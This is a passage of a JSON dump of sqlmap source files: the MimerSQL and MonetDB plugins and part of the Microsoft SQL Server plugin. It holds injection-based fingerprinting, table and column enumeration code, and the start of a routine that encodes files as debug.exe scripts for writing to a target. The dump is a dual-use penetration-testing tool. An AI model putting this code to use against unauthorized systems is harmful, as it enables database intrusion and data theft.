    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on MimerSQL it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on MimerSQL it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on MimerSQL it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on MimerSQL it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/monetdb/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import MONETDB_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.monetdb.enumeration import Enumeration\nfrom plugins.dbms.monetdb.filesystem import Filesystem\nfrom plugins.dbms.monetdb.fingerprint import Fingerprint\nfrom plugins.dbms.monetdb.syntax import Syntax\nfrom plugins.dbms.monetdb.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass MonetDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines MonetDB methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = MONETDB_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.MONETDB] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/monetdb/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import pymonetdb\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/gijzelaerr/pymonetdb\n    User guide: https://pymonetdb.readthedocs.io/en/latest/index.html\n    API: https://www.python.org/dev/peps/pep-0249/\n    License: Mozilla Public License 2.0\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = pymonetdb.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout)\n        except pymonetdb.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except pymonetdb.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except (pymonetdb.OperationalError, pymonetdb.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except pymonetdb.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/monetdb/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getPasswordHashes(self):\n        warnMsg = \"on MonetDB it is not possible to enumerate password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getStatements(self):\n        warnMsg = \"on MonetDB it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on MonetDB it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on MonetDB it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on MonetDB it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/monetdb/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/monetdb/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import MONETDB_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.MONETDB)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.MONETDB\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(MONETDB_ALIASES):\n            setDbms(DBMS.MONETDB)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.MONETDB\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"isaurl(NULL)=false\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.MONETDB\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"CODE(0) IS NOT NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.MONETDB\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.MONETDB)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.MONETDB\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/monetdb/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> from lib.core.common import Backend\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CODE(97)||CODE(98)||CODE(99)||CODE(100)||CODE(101)||CODE(102)||CODE(103)||CODE(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CODE(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/monetdb/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on MonetDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on MonetDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on MonetDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on MonetDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mssqlserver/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import MSSQL_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.mssqlserver.enumeration import Enumeration\nfrom plugins.dbms.mssqlserver.filesystem import Filesystem\nfrom plugins.dbms.mssqlserver.fingerprint import Fingerprint\nfrom plugins.dbms.mssqlserver.syntax import Syntax\nfrom plugins.dbms.mssqlserver.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Microsoft SQL Server methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = MSSQL_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.MSSQL] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mssqlserver/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import _mssql\n    import pymssql\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.convert import getText\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: http://www.pymssql.org/en/stable/\n    User guide: http://www.pymssql.org/en/stable/pymssql_examples.html\n    API: http://www.pymssql.org/en/stable/ref/pymssql.html\n    Debian package: python-pymssql\n    License: LGPL\n\n    Possible connectors: http://wiki.python.org/moin/SQL%20Server\n\n    Important note: pymssql library on your system MUST be version 1.0.2\n    to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = pymssql.connect(host=\"%s:%d\" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)\n        except (pymssql.Error, _mssql.MssqlDatabaseException) as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n        except ValueError:\n            raise SqlmapConnectionException\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except (pymssql.Error, _mssql.MssqlDatabaseException) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex).replace(\"\\n\", \" \"))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(getText(query))\n            retVal = True\n        except (pymssql.OperationalError, pymssql.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex).replace(\"\\n\", \" \"))\n        except pymssql.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n            try:\n                self.connector.commit()\n            except pymssql.OperationalError:\n                pass\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mssqlserver/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.agent import agent\nfrom lib.core.common import arrayizeValue\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import isInferenceAvailable\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import CURRENT_DB\nfrom lib.request import inject\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\nfrom thirdparty import six\n\nclass Enumeration(GenericEnumeration):\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Microsoft SQL Server it is not possible to fetch \"\n        warnMsg += \"database users privileges, sqlmap will check whether \"\n        warnMsg += \"or not the database users are database administrators\"\n        logger.warning(warnMsg)\n\n        users = []\n        areAdmins = set()\n\n        if conf.user:\n            users = [conf.user]\n        elif not len(kb.data.cachedUsers):\n            users = self.getUsers()\n        else:\n            users = kb.data.cachedUsers\n\n        for user in users:\n            user = unArrayizeValue(user)\n\n            if user is None:\n                continue\n\n            isDba = self.isDba(user)\n\n            if isDba is True:\n                areAdmins.add(user)\n\n            kb.data.cachedUsersPrivileges[user] = None\n\n        return (kb.data.cachedUsersPrivileges, areAdmins)\n\n    def getTables(self):\n        if len(kb.data.cachedTables) > 0:\n            return kb.data.cachedTables\n\n        self.forceDbmsEnum()\n\n        if conf.db == CURRENT_DB:\n            conf.db = self.getCurrentDb()\n\n        if conf.db:\n            dbs = conf.db.split(',')\n        else:\n            dbs = self.getDbs()\n\n        for db in dbs:\n            dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)\n\n        dbs = [_ for _ in dbs if _]\n\n        infoMsg = \"fetching tables for database\"\n        infoMsg += \"%s: %s\" % (\"s\" if len(dbs) > 1 else \"\", \", \".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs)))\n        logger.info(infoMsg)\n\n        rootQuery = queries[DBMS.MSSQL].tables\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            for db in dbs:\n                if conf.excludeSysDbs and db in self.excludeDbsList:\n                    infoMsg = \"skipping system database '%s'\" % db\n                    singleTimeLogMessage(infoMsg)\n                    continue\n\n                if conf.exclude and re.search(conf.exclude, db, re.I) is not None:\n                    infoMsg = \"skipping database '%s'\" % db\n                    singleTimeLogMessage(infoMsg)\n                    continue\n\n                for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3):\n                    query = query.replace(\"%s\", db)\n                    value = inject.getValue(query, blind=False, time=False)\n                    if not isNoneValue(value):\n                        break\n\n                if not isNoneValue(value):\n                    value = [_ for _ in arrayizeValue(value) if _]\n                    value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value]\n                    kb.data.cachedTables[db] = value\n\n        if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:\n            for db in dbs:\n                if conf.excludeSysDbs and db in self.excludeDbsList:\n                    infoMsg = \"skipping system database '%s'\" % db\n                    singleTimeLogMessage(infoMsg)\n                    continue\n\n                if conf.exclude and re.search(conf.exclude, db, re.I) is not None:\n                    infoMsg = \"skipping database '%s'\" % db\n                    singleTimeLogMessage(infoMsg)\n                    continue\n\n                infoMsg = \"fetching number of tables for \"\n                infoMsg += \"database '%s'\" % db\n                logger.info(infoMsg)\n\n                for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):\n                    _ = query.replace(\"%s\", db)\n                    count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n                    if not isNoneValue(count):\n                        break\n\n                if not isNumPosStrValue(count):\n                    if count != 0:\n                        warnMsg = \"unable to retrieve the number of \"\n                        warnMsg += \"tables for database '%s'\" % db\n                        logger.warning(warnMsg)\n                    continue\n\n                tables = []\n\n                for index in xrange(int(count)):\n                    _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace(\"%s\", db), index)\n\n                    table = inject.getValue(_, union=False, error=False)\n                    if not isNoneValue(table):\n                        kb.hintValue = table\n                        table = safeSQLIdentificatorNaming(table, True)\n                        tables.append(table)\n\n                if tables:\n                    kb.data.cachedTables[db] = tables\n                else:\n                    warnMsg = \"unable to retrieve the tables \"\n                    warnMsg += \"for database '%s'\" % db\n                    logger.warning(warnMsg)\n\n        if not kb.data.cachedTables and not conf.search:\n            errMsg = \"unable to retrieve the tables for any database\"\n            raise SqlmapNoneDataException(errMsg)\n        else:\n            for db, tables in kb.data.cachedTables.items():\n                kb.data.cachedTables[db] = sorted(tables) if tables else tables\n\n        return kb.data.cachedTables\n\n    def searchTable(self):\n        foundTbls = {}\n        tblList = conf.tbl.split(',')\n        rootQuery = queries[DBMS.MSSQL].search_table\n        tblCond = rootQuery.inband.condition\n        tblConsider, tblCondParam = self.likeOrExact(\"table\")\n\n        if conf.db == CURRENT_DB:\n            conf.db = self.getCurrentDb()\n\n        if conf.db:\n            enumDbs = conf.db.split(',')\n        elif not len(kb.data.cachedDbs):\n            enumDbs = self.getDbs()\n        else:\n            enumDbs = kb.data.cachedDbs\n\n        for db in enumDbs:\n            db = safeSQLIdentificatorNaming(db)\n            foundTbls[db] = []\n\n        for tbl in tblList:\n            tbl = safeSQLIdentificatorNaming(tbl, True)\n\n            infoMsg = \"searching table\"\n            if tblConsider == \"1\":\n                infoMsg += \"s LIKE\"\n            infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n            logger.info(infoMsg)\n\n            tblQuery = \"%s%s\" % (tblCond, tblCondParam)\n            tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl)\n\n            for db in foundTbls.keys():\n                db = safeSQLIdentificatorNaming(db)\n\n                if conf.excludeSysDbs and db in self.excludeDbsList:\n                    infoMsg = \"skipping system database '%s'\" % db\n                    singleTimeLogMessage(infoMsg)\n                    continue\n\n                if conf.exclude and re.search(conf.exclude, db, re.I) is not None:\n                    infoMsg = \"skipping database '%s'\" % db\n                    singleTimeLogMessage(infoMsg)\n                    continue\n\n                if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                    query = rootQuery.inband.query.replace(\"%s\", db)\n                    query += tblQuery\n                    values = inject.getValue(query, blind=False, time=False)\n\n                    if not isNoneValue(values):\n                        if isinstance(values, six.string_types):\n                            values = [values]\n\n                        for foundTbl in values:\n                            if foundTbl is None:\n                                continue\n\n                            foundTbls[db].append(foundTbl)\n                else:\n                    infoMsg = \"fetching number of table\"\n                    if tblConsider == \"1\":\n                        infoMsg += \"s LIKE\"\n                    infoMsg += \" '%s' in database '%s'\" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db))\n                    logger.info(infoMsg)\n\n                    query = rootQuery.blind.count\n                    query = query.replace(\"%s\", db)\n                    query += \" AND %s\" % tblQuery\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    if not isNumPosStrValue(count):\n                        warnMsg = \"no table\"\n                        if tblConsider == \"1\":\n                            warnMsg += \"s LIKE\"\n                        warnMsg += \" '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                        warnMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                        logger.warning(warnMsg)\n\n                        continue\n\n                    indexRange = getLimitRange(count)\n\n                    for index in indexRange:\n                        query = rootQuery.blind.query\n                        query = query.replace(\"%s\", db)\n                        query += \" AND %s\" % tblQuery\n                        query = agent.limitQuery(index, query, tblCond)\n                        tbl = inject.getValue(query, union=False, error=False)\n                        kb.hintValue = tbl\n                        foundTbls[db].append(tbl)\n\n        for db, tbls in list(foundTbls.items()):\n            if len(tbls) == 0:\n                foundTbls.pop(db)\n\n        if not foundTbls:\n            warnMsg = \"no databases contain any of the provided tables\"\n            logger.warning(warnMsg)\n            return\n\n        conf.dumper.dbTables(foundTbls)\n        self.dumpFoundTables(foundTbls)\n\n    def searchColumn(self):\n        rootQuery = queries[DBMS.MSSQL].search_column\n        foundCols = {}\n        dbs = {}\n        whereTblsQuery = \"\"\n        infoMsgTbl = \"\"\n        infoMsgDb = \"\"\n        colList = conf.col.split(',')\n\n        if conf.exclude:\n            colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]\n\n        origTbl = conf.tbl\n        origDb = conf.db\n        colCond = rootQuery.inband.condition\n        tblCond = rootQuery.inband.condition2\n        colConsider, colCondParam = self.likeOrExact(\"column\")\n\n        if conf.db == CURRENT_DB:\n            conf.db = self.getCurrentDb()\n\n        if conf.db:\n            enumDbs = conf.db.split(',')\n        elif not len(kb.data.cachedDbs):\n            enumDbs = self.getDbs()\n        else:\n            enumDbs = kb.data.cachedDbs\n\n        for db in enumDbs:\n            db = safeSQLIdentificatorNaming(db)\n            dbs[db] = {}\n\n        for column in colList:\n            column = safeSQLIdentificatorNaming(column)\n            conf.db = origDb\n            conf.tbl = origTbl\n\n            infoMsg = \"searching column\"\n            if colConsider == \"1\":\n                infoMsg += \"s LIKE\"\n            infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(column)\n\n            foundCols[column] = {}\n\n            if conf.tbl:\n                _ = conf.tbl.split(',')\n                whereTblsQuery = \" AND (\" + \" OR \".join(\"%s = '%s'\" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + \")\"\n                infoMsgTbl = \" for table%s '%s'\" % (\"s\" if len(_) > 1 else \"\", \", \".join(tbl for tbl in _))\n\n            if conf.db == CURRENT_DB:\n                conf.db = self.getCurrentDb()\n\n            if conf.db:\n                _ = conf.db.split(',')\n                infoMsgDb = \" in database%s '%s'\" % (\"s\" if len(_) > 1 else \"\", \", \".join(db for db in _))\n            elif conf.excludeSysDbs:\n                infoMsgDb = \" not in system database%s '%s'\" % (\"s\" if len(self.excludeDbsList) > 1 else \"\", \", \".join(db for db in self.excludeDbsList))\n            else:\n                infoMsgDb = \" across all databases\"\n\n            logger.info(\"%s%s%s\" % (infoMsg, infoMsgTbl, infoMsgDb))\n\n            colQuery = \"%s%s\" % (colCond, colCondParam)\n            colQuery = colQuery % unsafeSQLIdentificatorNaming(column)\n\n            for db in (_ for _ in dbs if _):\n                db = safeSQLIdentificatorNaming(db)\n\n                if conf.excludeSysDbs and db in self.excludeDbsList:\n                    continue\n\n                if conf.exclude and re.search(conf.exclude, db, re.I) is not None:\n                    continue\n\n                if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                    query = rootQuery.inband.query % (db, db, db, db, db, db)\n                    query += \" AND %s\" % colQuery.replace(\"[DB]\", db)\n                    query += whereTblsQuery.replace(\"[DB]\", db)\n                    values = inject.getValue(query, blind=False, time=False)\n\n                    if not isNoneValue(values):\n                        if isinstance(values, six.string_types):\n                            values = [values]\n\n                        for foundTbl in values:\n                            foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True)\n\n                            if foundTbl is None:\n                                continue\n\n                            if foundTbl not in dbs[db]:\n                                dbs[db][foundTbl] = {}\n\n                            if colConsider == '1':\n                                conf.db = db\n                                conf.tbl = foundTbl\n                                conf.col = column\n\n                                self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)\n\n                                if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):\n                                    dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])\n\n                                kb.data.cachedColumns = {}\n                            else:\n                                dbs[db][foundTbl][column] = None\n\n                            if db in foundCols[column]:\n                                foundCols[column][db].append(foundTbl)\n                            else:\n                                foundCols[column][db] = [foundTbl]\n                else:\n                    foundCols[column][db] = []\n\n                    infoMsg = \"fetching number of tables containing column\"\n                    if colConsider == \"1\":\n                        infoMsg += \"s LIKE\"\n                    infoMsg += \" '%s' in database '%s'\" % (column, db)\n                    logger.info(\"%s%s\" % (infoMsg, infoMsgTbl))\n\n                    query = rootQuery.blind.count\n                    query = query % (db, db, db, db, db, db)\n                    query += \" AND %s\" % colQuery.replace(\"[DB]\", db)\n                    query += whereTblsQuery.replace(\"[DB]\", db)\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    if not isNumPosStrValue(count):\n                        warnMsg = \"no tables contain column\"\n                        if colConsider == \"1\":\n                            warnMsg += \"s LIKE\"\n                        warnMsg += \" '%s' \" % column\n                        warnMsg += \"in database '%s'\" % db\n                        logger.warning(warnMsg)\n\n                        continue\n\n                    indexRange = getLimitRange(count)\n\n                    for index in indexRange:\n                        query = rootQuery.blind.query\n                        query = query % (db, db, db, db, db, db)\n                        query += \" AND %s\" % colQuery.replace(\"[DB]\", db)\n                        query += whereTblsQuery.replace(\"[DB]\", db)\n                        query = agent.limitQuery(index, query, colCond.replace(\"[DB]\", db))\n                        tbl = inject.getValue(query, union=False, error=False)\n                        kb.hintValue = tbl\n\n                        tbl = safeSQLIdentificatorNaming(tbl, True)\n\n                        if tbl not in dbs[db]:\n                            dbs[db][tbl] = {}\n\n                        if colConsider == \"1\":\n                            conf.db = db\n                            conf.tbl = tbl\n                            conf.col = column\n\n                            self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)\n\n                            if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:\n                                dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])\n                            kb.data.cachedColumns = {}\n                        else:\n                            dbs[db][tbl][column] = None\n\n                        foundCols[column][db].append(tbl)\n\n        conf.dumper.dbColumns(foundCols, colConsider, dbs)\n        self.dumpFoundColumn(dbs, foundCols, colConsider)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mssqlserver/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport ntpath\nimport os\n\nfrom lib.core.common import checkFile\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import posixToNtSlashes\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.compat import xrange\nfrom lib.core.convert import encodeBase64\nfrom lib.core.convert import encodeHex\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.request import inject\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def _dataToScr(self, fileContent, chunkName):\n        fileLines = []\n        fileSize = len(fileContent)\n        lineAddr = 0x100\n        lineLen = 20\n\n        fileLines.append(\"n %s\" % chunkName)\n        fileLines.append(\"rcx\")\n        fileLines.append(\"%x\" % fileSize)\n        fileLines.append(\"f 0100 %x 00\" % fileSize)\n\n        for fileLine in xrange(0, len(fileContent), lineLen):\n            scrString = \"\"\n\n            for lineChar in fileContent[fileLine:fileLine + lineLen]:\n                strLineChar = encodeHex(lineChar, binary=False)\n\n                if not scrString:\n                    scrString = \"e %x %s\" % (lineAddr, strLineChar)\n                else:\n                    scrString += \" 